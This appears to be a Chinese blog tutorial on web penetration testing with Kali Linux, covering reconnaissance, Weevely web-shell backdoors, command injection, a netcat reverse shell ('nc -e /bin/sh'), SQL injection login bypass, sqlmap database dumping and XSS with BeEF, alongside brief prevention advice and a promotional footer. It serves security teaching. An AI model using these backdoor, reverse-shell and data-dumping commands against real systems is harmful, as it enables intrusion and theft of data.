Web渗透:如何使用 Kali Linux 来访问目标 PC!什么是 Kali Linux?“Kali Linux 是一个基于 Debian 的 Linux 发行版,旨在进行高级渗透测试和安全审核”。
网络信息收集
在Web渗透中,信息就是力量、就是安全。因此,我们总是首先收集尽可能多的有关目标的信息——因为这可能会告诉我们实施攻击的最佳方式。
一台计算机(同一IP)上可以安装多个网站。如果您无法进入目标,请尝试侵入另一个网站。获取同一 IP 上的网站(Robtex 除外)的另一种方法是使用 bing 和 search ip。

发现子域
使用名为“knock”的工具(通常安装到 Kali 上的 /opt 中)。与 Kali Linux 上的大多数工具一样,Knock 是开源的,可以在https://github.com/guelfoweb/knock找到。
git clone <https://github.com/guelfoweb/knock.git>
cd 进入文件夹。
python knock.py 目标
如果不起作用,尝试使用 --resolve 运行上述命令,然后再次运行上述命令。
发现敏感文件
DIRB 是一个 Web 内容扫描器,它查找现有(或隐藏)的 Web 对象,在Web渗透中非常有用!DIRB 的工作原理是对 Web 服务器发起字典攻击并分析响应(本质上只是尝试不同的文件名并查看是否有响应)。
dirb [目标] [字典] [选项]
1. /:通常表示您位于一个目录中。
2. phpinfo.php:非常有用的信息
3. robots.txt:管理员不希望我们看到的隐藏信息。
利用****服务器漏洞
利用服务器漏洞进行Web渗透到常见方式,以下是利用 Web 服务器获得不同结果的一系列方法。
利用文件上传漏洞获取访问权限
Weevely 是一个隐秘的 Web shell,用于模拟类似 telnet 的连接。这可用作后门和/或管理 Web 服务器上的 Web 帐户。
创建后门:
weevly generate [密码] [路径+文件名]
上传文件:
weevly [文件地址]- 连接到文件
在尝试使用工具之前,只需浏览网站并感受一下,寻找功能中的漏洞,特别是网站是否允许上传。
利用代码执行漏洞
始终尝试您看到的任何输入框,因为它们正在执行命令,您也许可以更改该命令。
可以使用" && “或” ; "在unix中,可以在一行中执行多个命令。测试输入框是否允许这样做。
大多数服务器都有 python 和 netcat。
监听传入连接,例如使用 netcat:
netcat -vv -l -p [端口]- 侦听端口 8080 上的连接
IE。nc -e /bin/sh [ip] [端口] - netcat 连接。
下面是您可以执行以获得不同受支持语言的反向连接的命令列表。其中要更改的变量由[HOST_IP]和 表示,可以选择更改端口。请注意,这些都是“一行代码”,因此它们可以在输入框中执行。
预防 Web 服务器漏洞
发生上述情况只是因为服务器允许并且配置错误。
1、文件上传漏洞
· 不允许上传不安全的文件。
· 如果您要求提供图像,请确保它是图像,切勿允许 exe 上传。
· 检查文件类型,而不是扩展名。
2、代码执行漏洞
· 不要使用危险的功能,
· 执行前过滤输入
· 如果必须使用函数,请确保在执行之前分析输入。
· 使用正则表达式(regex)。
3、文件包含漏洞
· 禁用 php 中的allow_url_fopen 和allow_url_include 设置(在/etc/php5/cgi/php.ini 中)
· 使用静态文件包含(对文件进行硬编码)
SQL注入和攻击
连接到 mySQL 数据库:
mysql -u [用户名] -h [IP of server]
show 数据库
use [数据库]
show tables
通过注入绕过登录
另一个巧妙的用途是注入 SQL 查询,使得查询最终为SELECT * from accounts where user=‘admin’ and password=‘wrong_password’ or 1=1,这可能会以管理员身份登录我们,而根本不知道密码,因为如果查询评估 1 为,则 and 语句中的第二种情况将为 True等于 1。这在Web渗透中有很大的作用。
发现数据检索 (GET) 中的 SQL 注入
始终尝试在 php 脚本中注入内容(在地址栏中,它看起来像index.php&username=xxxx&password=xxxxx)
在字段后使用 ORDER BY,例如。index.php&username=xxxx’ ORDER BY 1 #&password=xxxxx确保对符号使用 URL 编码,即。# = %23
按列 100000 排序将返回错误,继续按 1,2,3,4,5 进行排序。
使用 SQLmap 执行上述及更多操作
`sqlmap --help` `sqlmap -u "[target_url]"` `sqlmap -u "[target_url]" --dbs`
获取数据库
sqlmap -u "[target_url]" --current-user
获取用户
sqlmap -u "[target_url]" --current-db
当前数据库
sqlmap -u "[target_url]" --tables -D [database]
获取-D数据库中的表
sqlmap -u "[target_url]" --columns -T [table_name] -D [database]
获取数据库表中的列
sqlmap -u "[target_url]" -T [table_name] -D [database] --dump
获取数据库表中的所有数据。
SQL漏洞防范
· 使用过滤器(但可以绕过)
· 使用拒绝列表或允许列表。(但可以绕过)
· 最好的方法是以不允许代码注入的方式对 Web 应用程序进行编码。
· 要执行上述操作,您必须使用参数化语句。(其中数据和代码是分开的)
跨站脚本(XSS)
在浏览网站的人而不是服务器上执行。允许将 javascript 注入到页面上。页面加载时执行代码。
三个主要类型
1. 持久/存储型 XSS
2. 反射型 XSS - 非持久性 XSS。仅当目标访问特制的网址时才有效,例如。target.com/page.php?something=alert(‘xss’)
3. 基于 DOM 的 XSS
使用参数(php 的东西)测试文本框和 url。
将牛肉钩注入易受攻击的页面。如果文本区域有最大长度,请进入开发人员控制台并检查元素并更改最大长度。
XSS漏洞防范
· 最小化输入。
· 将用户输入转换为 html 字符符号 so&nsb并使用 代替 & &jsjs;。
· 转义输入。
· 很少信任浏览器内的警报!
自动发现Web漏洞
使用 Zed Attack Proxy (zap) https://owasp.org/www-project-zap/,它已经安装在 Kali 上。
1. 在应用程序中搜索 ZAP
2. 您必须通过 github 获取此应用程序。
3. chmod +x [文件名]
4. 运行
5. 安装后点击不再持久。
6. 左侧的齿轮图标允许修改选项
7. 如果您单击底部窗口上的绿色加号,则转到活动扫描。然后,您可以在窗口左上角的小面板中更改策略。
8. 在自动扫描中添加 url。
9. 警报下方的左下角显示了所有已发现的漏洞。
10. 如果您右键单击其中一个警报(左下角),然后在浏览器中打开,它将向您显示该漏洞及其如何获取它。
Web渗透归根结底还是几个技术活,所以要学习的东西还是很多的!
题外话
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习路线&学习资源
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

需要高清完整学习路线图,和全套网络安全技术教程的小伙伴!
↓↓↓ 扫描下方图片即可前往获取↓↓↓
学习资料电子文档
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。

网络安全源码合集+工具包
视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,,每个章节都是当前板块的精华浓缩。(全套教程点击领取哈)

因篇幅有限,仅展示部分资料,需要扫描下方图片即可前往获取

好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!
特别声明:
此教程为纯技术分享!本文的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。!!!
本文转自网络,如有侵权请联系删除。
2585

被折叠的 条评论
为什么被折叠?



